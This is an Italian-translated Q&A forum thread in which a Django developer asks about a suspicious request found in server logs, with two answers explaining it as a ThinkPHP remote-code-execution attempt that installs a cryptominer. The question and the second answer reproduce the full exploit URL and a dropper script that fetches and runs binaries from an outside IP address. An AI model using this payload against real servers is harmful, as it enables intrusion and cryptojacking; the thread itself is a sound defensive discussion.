Strana richiesta GET alla mia applicazione web

Naviga le tue risposte
0

Ho sviluppato un'applicazione Django per un progetto scolastico e l'ho ospitata su un'istanza EC2 per testare e apprendere l'ambiente.

Durante l'ispezione dei log, ho trovato la seguente richiesta GET, 

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472

Questo sembra strano perché non uso PHP, suppongo che qualcuno presume che io usi PHP, quindi ho provato a scaricare ed eseguire uno script ex.sh da 205.185.113.123 . Il contenuto di quello script è, 

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Dato che non conosco molto bene le app e la sicurezza web, ho alcune domande,

  • È un attacco? In tal caso, qual è il nome di questo attacco?
  • Questo attacco può essere adattato per Django anziché per PHP?
  • È normale per le app Web? Ricevono sempre questo tipo di richieste?
  • In base al link , l'indirizzo IP è registrato per una società denominata FranTech Solutions. Sono collegati a questo attacco?
  • È illegale? In tal caso, posso intraprendere un'azione legale?
posta Emre Sülün 25.12.2018 - 12:24
fonte

2 risposte

3
  • Si sta tentando di sfruttare un codice remoto vulnerabilità di esecuzione in ThinkPHP . Quindi sì, qualcuno sta tentando di attaccare.
  • Sì, anche se questo specifico è specifico per ThinkPHP, ci sono anche regolarmente vulnerabilità per Django
  • Sì, questo è molto comune per le app Web. Questo non è l'unico tipo di richiesta di attacco e un attaccante di successo potrebbe cambiare il file di registro in modo da non notare che c'era un attacco. A mio parere, un'app web ospitata pubblicamente che elabora informazioni non pubbliche (questo include anche nomi utente / password per l'accesso) non dovrebbe essere eseguita per un progetto scolastico, almeno senza una consulenza professionale a causa dei rischi come i dati rubati. Anche con solo le informazioni disponibili pubblicamente può causare danni come i costi per i costi di calcolo, come quando l'hacker lo utilizza come cripto-minatore (come nel tuo caso) e riesce a far girare più istanze.
  • Le soluzioni FranTech sembrano affittare server. Quindi potrebbe essere FranTech Solutions, potrebbe essere un cliente di FranTech Solutions o potrebbe essere qualcuno che ha violato un cliente di FranTech Solutions.
  • Se è illegale o no dipende dalla giurisdizione. Ma in genere la polizia non sarà interessata a tentativi senza danni significativi. È possibile inviare un reclamo a FranTech Solutions e se ricevono abbastanza reclami potrebbero o non potrebbero chiudere il server o il cliente o potrebbero o non potrebbero semplicemente informare il cliente del server che il server potrebbe essere stato violato e il cliente potrebbe o potrebbe non aggiustare il server.

In genere i webmaster ignorano tali voci di registro dopo essersi assicurati che non siano vulnerabili perché è così comune, specialmente se il sito ha più di 100 utenti.

    
risposta data 25.12.2018 - 13:38
fonte
0

Sì, questo exploit è fondamentalmente il caricamento della shell. In quale utente malintenzionato caricare il file e tale file interagisce direttamente con il server per eseguire i comandi di sistema da remoto.

Ho già scaricato quel file dal tuo link che assomiglia a questo 

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Fondamentalmente quel file scarica altri 2 file che sono mcoin e sefa.x86 hai bisogno di cercare anche quei 2 file. Questi due file sono file precompilati quindi è molto difficile dire cosa effettivamente ciò vale per il tuo server. Ma secondo il mio studio quei file sono minatori in criptovaluta.

link

Risposte: 1) È un attacco? Se è così, questo è il nome di questo attacco?

Sì, caricamento della shell

2) Questo attacco può essere adattato per Django al posto di PHP?

Se vuoi davvero sapere che l'attacco è stato eseguito correttamente, devi cercare nella directory del tuo server web e trovare il nome del file ex.sh mcoin sefa. 86

3) È normale per le app Web? Ricevono sempre quel tipo di richieste? No,

4) È illegale? In tal caso, posso iniziare un'azione legale?

sì, questo è illegale, sì, puoi fare l'azione legale

    
risposta data 25.12.2018 - 14:01
fonte

Leggi altre domande sui tag

Alla ricerca di informazioni sul lavoro da consulenti di sicurezza Come proteggere il traffico wifi dallo sniffing se le persone non fidate conoscono la password?